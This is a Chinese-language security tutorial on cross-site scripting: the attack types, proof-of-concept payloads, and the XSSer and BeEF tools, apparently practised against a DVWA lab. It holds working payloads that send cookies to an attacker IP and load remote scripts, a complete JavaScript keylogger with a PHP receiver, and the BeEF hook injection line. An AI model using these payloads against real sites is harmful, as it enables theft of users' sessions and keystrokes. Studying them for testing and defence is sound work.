XSS原理及其相应工具使用
XSS(厉害程度:只要js能实现什么功能,xss就能对client造成什么伤害):
原理:通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击目的
主要攻击目的(网页挂马:通过XSS向前端页面插入一个包含恶意js的链接,client访问这个页面时就同时请求执行了该恶意js,这个恶意js就是网页木马):
1、盗取cookie(收集存在XSS漏洞网站用户的cookie)
2、重定向(访问真实页面时直接跳转到博彩页面或者钓鱼网站)
3、DDOS第三方(把需要大量算力的URL贴在存在XSS漏洞的网站上,这样访问该网站的用户就都会去请求那个需要大量算力的URL,进而对该URL服务器进行CC攻击)
分类:
1、存储型(持久型) ===> 将js脚本上传至server,其他用户访问server时都会加载这个js,e.g: 论坛发帖,server没有对帖子内容进行过滤,导致上传了一段js脚本
2、反射型(非持久)(发给目标什么东西就必须返回什么东西,不能有变化) ===> client将恶意js发给server(client可将js包含在get请求头中),server再将这个js返回给client,client就能在浏览器里运行这个js了 ===> 通过社工方式将带有js脚本的链接发送给受害者,e.g: http://1.1.1.1/id=js脚本
3、DOM型(本质上也是一种反射型) ===> 不必将js上传至server就能在client执行
POC验证原理:
向所有变量注入js代码进行测试
测试语句(Poc):
<script>alert('xss')</script> ===> js弹窗
<a href=http://192.168.1.1>click</a> ===> html超链接
<script>window.location='http://www.baidu.com'</script> ===> 重定向至百度
<script>new Image().src="http://172.20.163.101/admin.php?output="+document.cookie;</script> ===> 将cookie发送至172.20.163.101
<script src=http://172.20.163.101/a.js></script> ===> 自动请求http://172.20.163.101/a.js,可以在http://172.20.163.101/a.js存放真正的恶意js脚本
网页挂马实现举例(键盘记录功能):
原理:
1、通过xss将网页木马文件链接上传至漏洞服务器 <script src=http://172.20.163.101/a.js></script>
2、client访问该服务器时将请求并执行http://172.20.163.101/a.js
3、a.js将client的键盘记录发送至指定服务器 ("POST","http://172.20.163.101/keylogger.php",true)
键盘记录器(js代码):
document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)
http.open("POST","http://172.20.163.101/keylogger.php",true); =====> 将记录到的结果发送到http://172.20.163.101/keylogger.php
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
密码接收器(php代码,注意:此代码只能记录当前页面的键盘记录,不能记录其他网站页面的键盘记录):
<?php
$key=$_POST['key'];
$logfile="keylog.txt"; ======> 将接收到的结果存在keylog.txt文件内
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>
Xsser(XSS漏洞检测工具):
xsser --gtk ===> 图形化界面打开方式
xsser使用举例: xsser -u "http://172.20.163.115/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=34554fae634cb96063453427536bda0b" -s -v --reverse-check
-u 待检测url(注意:只写到倒数第二级目录)
-g 使用GET方法,使用POST方法时可换用'-p'参数。后跟要检测的变量名称(注意要带上变量上一级目录)
--cookie cookie信息
-s 显示总共发送了多少次探测payload
-v 显示详细信息
--reverse-check:如果不加这个参数xsser会只发送一个hash值给服务器,看是否能将该hash原封不动的返回回来。但是这样可能会有一个问题:服务器没有过滤hash值,但过滤了html(js)代码,造成了xsser显示有xss漏洞,但是不能真正利用。加这个参数后xsser会再发送一个真正的js脚本来检测(发送的js脚本功能为主动连接自己某个端口,如果xsser发现将js发送过去后它又来连接自己制定端口了就说明对方存在xss漏洞)。
--heuristic 检查被过滤的字符(有些安全设备可能会过滤掉一些特定字符,利用此参数可以查看安全设备过滤掉了哪些字符)(原理:按个儿发送单个可能被过滤的字符,看是否有返回这个字符)
以下参数为对提交的数据进行编码
--Str Use method String.FromCharCode()
--Une Use Unescape() function
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding with semicolons
--Dwo Encode IP addresses with DWORD
--Doo Encode IP addresses with Octal
--Cem=CEM Set different 'Character Encoding Mutations'
(reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
除指定变量外再对一些特殊的地方注入:
--Coo 对COOKIE进行xss注入检测
--Xsa 对user-agent进行xss注入检测
--Xsr 对Referer进行xss注入检测
--Dcp 对数据控制协议进行xss注入检测
--Dom 对DOM型进行xss注入检测
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
beef(可以操纵用户的浏览器):
利用XSS漏洞或者中间人劫持将特定js(<script src="http://<beef服务器的IP>:3000/hook.js"></script>)插入网页,这个js将控制客户端浏览器并返连至beef服务器。
换句话说:<script src="http://<beef服务器的IP>:3000/hook.js"></script> 就是一个js木马,beef服务器就是木马的server端。
菜单详解:
Details: 浏览器、插件版本信息;操作系统信息
Logs:记录浏览器的动作,比如焦点变化、鼠标点击、信息输入等
Commands:命令模块
绿色模块:表示模块适合目标浏览器,并且执行结果对客户端不可见
红色模块:表示模块不适用于当前用户,有些红色模块也可正常执行
橙色模块:模块可用,但结果对用户可见(CAM弹窗申请权限等)
灰色模块:模块未在目标浏览器上测试过
